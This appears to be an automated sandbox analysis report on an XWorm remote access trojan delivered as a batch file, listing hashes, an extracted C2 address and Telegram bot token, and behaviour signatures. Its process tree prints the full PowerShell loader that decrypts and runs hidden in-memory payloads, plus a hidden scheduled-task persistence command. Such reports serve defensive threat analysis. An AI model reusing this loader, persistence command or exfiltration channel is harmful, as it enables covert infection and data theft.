xworm | 09ebaac81c2816aae61095e019924152b15c1504b0f2f6b512c4230b72268bf8

Analysis

max time kernel
137s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
03-07-2024 20:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

wild2.bat
Size

101KB
MD5

1b0db010a5478b1bd34e62d563490b57
SHA1

8d138974f30d83f9f1dfd7ffb89c830b290dc647
SHA256

6e10dd12715347b79ddc3aaaa30be9b00548cf54f7b515e66e78f995b6412162
SHA512

a081a9ae668b2f9389d8b5648a9bc218cb6e8002d76955307104324b66fc22cfda501a8c6e69b3f87fe582fee8ab6feb8bac365412852708c91cd6673621db8f
SSDEEP

3072:8fmmAtb3zUdrhco3sgrDIt+YaNQsEerlw5i:Cmm6DUdqo8grMt+YKPt

Score

10^/10

xworm execution rat trojan

Malware Config

Extracted

Family

xworm

142.202.242.177:7000

Attributes

install_file
USB.exe
telegram
https://api.telegram.org/bot7086125226:AAHBCPyJPzMk3klDDrNR7WI_pR8VgcrX-rg/sendMessage?chat_id=5009918391

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral2/memory/4144-58-0x000002721F2A0000-0x000002721F2B6000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Blocklisted process makes network request 5 IoCs

flow	pid	Process
7	4144	powershell.exe
12	4144	powershell.exe
13	4144	powershell.exe
14	4144	powershell.exe
15	4144	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2400	powershell.exe
5008	powershell.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
4144	powershell.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
4144	powershell.exe
4144	powershell.exe
2400	powershell.exe
2400	powershell.exe
452	powershell.exe
452	powershell.exe
5008	powershell.exe
5008	powershell.exe
4144	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4144	powershell.exe
Token: SeDebugPrivilege	2400	powershell.exe
Token: SeDebugPrivilege	452	powershell.exe
Token: SeIncreaseQuotaPrivilege	452	powershell.exe
Token: SeSecurityPrivilege	452	powershell.exe
Token: SeTakeOwnershipPrivilege	452	powershell.exe
Token: SeLoadDriverPrivilege	452	powershell.exe
Token: SeSystemProfilePrivilege	452	powershell.exe
Token: SeSystemtimePrivilege	452	powershell.exe
Token: SeProfSingleProcessPrivilege	452	powershell.exe
Token: SeIncBasePriorityPrivilege	452	powershell.exe
Token: SeCreatePagefilePrivilege	452	powershell.exe
Token: SeBackupPrivilege	452	powershell.exe
Token: SeRestorePrivilege	452	powershell.exe
Token: SeShutdownPrivilege	452	powershell.exe
Token: SeDebugPrivilege	452	powershell.exe
Token: SeSystemEnvironmentPrivilege	452	powershell.exe
Token: SeRemoteShutdownPrivilege	452	powershell.exe
Token: SeUndockPrivilege	452	powershell.exe
Token: SeManageVolumePrivilege	452	powershell.exe
Token: 33	452	powershell.exe
Token: 34	452	powershell.exe
Token: 35	452	powershell.exe
Token: 36	452	powershell.exe
Token: SeDebugPrivilege	5008	powershell.exe
Token: SeIncreaseQuotaPrivilege	5008	powershell.exe
Token: SeSecurityPrivilege	5008	powershell.exe
Token: SeTakeOwnershipPrivilege	5008	powershell.exe
Token: SeLoadDriverPrivilege	5008	powershell.exe
Token: SeSystemProfilePrivilege	5008	powershell.exe
Token: SeSystemtimePrivilege	5008	powershell.exe
Token: SeProfSingleProcessPrivilege	5008	powershell.exe
Token: SeIncBasePriorityPrivilege	5008	powershell.exe
Token: SeCreatePagefilePrivilege	5008	powershell.exe
Token: SeBackupPrivilege	5008	powershell.exe
Token: SeRestorePrivilege	5008	powershell.exe
Token: SeShutdownPrivilege	5008	powershell.exe
Token: SeDebugPrivilege	5008	powershell.exe
Token: SeSystemEnvironmentPrivilege	5008	powershell.exe
Token: SeRemoteShutdownPrivilege	5008	powershell.exe
Token: SeUndockPrivilege	5008	powershell.exe
Token: SeManageVolumePrivilege	5008	powershell.exe
Token: 33	5008	powershell.exe
Token: 34	5008	powershell.exe
Token: 35	5008	powershell.exe
Token: 36	5008	powershell.exe
Token: SeIncreaseQuotaPrivilege	5008	powershell.exe
Token: SeSecurityPrivilege	5008	powershell.exe
Token: SeTakeOwnershipPrivilege	5008	powershell.exe
Token: SeLoadDriverPrivilege	5008	powershell.exe
Token: SeSystemProfilePrivilege	5008	powershell.exe
Token: SeSystemtimePrivilege	5008	powershell.exe
Token: SeProfSingleProcessPrivilege	5008	powershell.exe
Token: SeIncBasePriorityPrivilege	5008	powershell.exe
Token: SeCreatePagefilePrivilege	5008	powershell.exe
Token: SeBackupPrivilege	5008	powershell.exe
Token: SeRestorePrivilege	5008	powershell.exe
Token: SeShutdownPrivilege	5008	powershell.exe
Token: SeDebugPrivilege	5008	powershell.exe
Token: SeSystemEnvironmentPrivilege	5008	powershell.exe
Token: SeRemoteShutdownPrivilege	5008	powershell.exe
Token: SeUndockPrivilege	5008	powershell.exe
Token: SeManageVolumePrivilege	5008	powershell.exe
Token: 33	5008	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4144	powershell.exe

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 4232 wrote to memory of 4932	4232	cmd.exe	82
PID 4232 wrote to memory of 4932	4232	cmd.exe	82
PID 4232 wrote to memory of 4144	4232	cmd.exe	83
PID 4232 wrote to memory of 4144	4232	cmd.exe	83
PID 4144 wrote to memory of 2400	4144	powershell.exe	84
PID 4144 wrote to memory of 2400	4144	powershell.exe	84
PID 4144 wrote to memory of 452	4144	powershell.exe	85
PID 4144 wrote to memory of 452	4144	powershell.exe	85
PID 4144 wrote to memory of 5008	4144	powershell.exe	88
PID 4144 wrote to memory of 5008	4144	powershell.exe	88

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\wild2.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4232
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('7wFkEAMgT15IlR12QYdvYeiKFxGbAYX0oQI0LpFbKWU='); $aes_var.IV=[System.Convert]::FromBase64String('bGaT/qQXAZ1jwzjNeDyQCg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FNnBE=New-Object System.IO.MemoryStream(,$param_var); $AJjqG=New-Object System.IO.MemoryStream; $fbver=New-Object System.IO.Compression.GZipStream($FNnBE, [IO.Compression.CompressionMode]::Decompress); $fbver.CopyTo($AJjqG); $fbver.Dispose(); $FNnBE.Dispose(); $AJjqG.Dispose(); $AJjqG.ToArray();}function execute_function($param_var,$param2_var){ $QipFS=[System.Reflection.Assembly]::Load([byte[]]$param_var); $PhiBy=$QipFS.EntryPoint; $PhiBy.Invoke($null, $param2_var);}$VfwJS = 'C:\Users\Admin\AppData\Local\Temp\wild2.bat';$host.UI.RawUI.WindowTitle = $VfwJS;$CtScz=[System.IO.File]::ReadAllText($VfwJS).Split([Environment]::NewLine);foreach ($jbVyw in $CtScz) { if ($jbVyw.StartsWith('lxeWUjbreKgbBVHbyYLg')) { $SrUtu=$jbVyw.Substring(20); break; }}$payloads_var=[string[]]$SrUtu.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
  2⤵
  PID:4932
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4144
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2400
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\wild2')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:452
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SC.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5008

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
baebece6c25520221e68055be287f370

SHA1
a3e7232cd44a9c9980da327dcd5124a0889a5486

SHA256
4e97fe0cb5b7c529ae80d3678e9f31fc25c09f0b450f9231d8a472be0d35de07

SHA512
fb57454e55b0a17254f898f52e5106fd82bcf2046c310ed207fa9f2d44526f66ad49335c105947a21c57681f4365707c63809a566f60bad47f745891cb7e9c5d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
9d662ecae338ca923a784422a86e9925

SHA1
ccdbbd6f3a1801b13f503d92f5d48fe5041ab495

SHA256
af4b4d21aa532d4ca4638e2d3c9a07760dfeb65fbe782319860130ba09b62d6e

SHA512
5455380e241bd3f697a8697cac7bcce54a1dc323d33995067407bc92858bc2d2216f092cce674a87f3b2d9f34b61bb5b7b13c1b57d511f1540123d38cc7bf38e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_z3ynkswj.5wa.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/2400-24-0x00007FFC3E9F0000-0x00007FFC3F4B1000-memory.dmp

Filesize
10.8MB

Download
memory/2400-29-0x00007FFC3E9F0000-0x00007FFC3F4B1000-memory.dmp

Filesize
10.8MB

Download
memory/2400-26-0x00007FFC3E9F0000-0x00007FFC3F4B1000-memory.dmp

Filesize
10.8MB

Download
memory/2400-25-0x00007FFC3E9F0000-0x00007FFC3F4B1000-memory.dmp

Filesize
10.8MB

Download
memory/4144-13-0x000002721EDF0000-0x000002721EE34000-memory.dmp

Filesize
272KB

Download
memory/4144-33-0x00007FFC5B9F0000-0x00007FFC5BAAE000-memory.dmp

Filesize
760KB

Download
memory/4144-0-0x00007FFC3E9F3000-0x00007FFC3E9F5000-memory.dmp

Filesize
8KB

Download
memory/4144-12-0x00007FFC3E9F0000-0x00007FFC3F4B1000-memory.dmp

Filesize
10.8MB

Download
memory/4144-30-0x0000027205AB0000-0x0000027205AB8000-memory.dmp

Filesize
32KB

Download
memory/4144-31-0x000002721E070000-0x000002721E080000-memory.dmp

Filesize
64KB

Download
memory/4144-34-0x000002721E080000-0x000002721E094000-memory.dmp

Filesize
80KB

Download
memory/4144-14-0x000002721EEC0000-0x000002721EF36000-memory.dmp

Filesize
472KB

Download
memory/4144-32-0x00007FFC5CA70000-0x00007FFC5CC65000-memory.dmp

Filesize
2.0MB

Download
memory/4144-11-0x00007FFC3E9F0000-0x00007FFC3F4B1000-memory.dmp

Filesize
10.8MB

Download
memory/4144-6-0x0000027205A80000-0x0000027205AA2000-memory.dmp

Filesize
136KB

Download
memory/4144-58-0x000002721F2A0000-0x000002721F2B6000-memory.dmp

Filesize
88KB

Download
memory/4144-60-0x00007FFC3E9F3000-0x00007FFC3E9F5000-memory.dmp

Filesize
8KB

Download
memory/4144-61-0x00007FFC3E9F0000-0x00007FFC3F4B1000-memory.dmp

Filesize
10.8MB

Download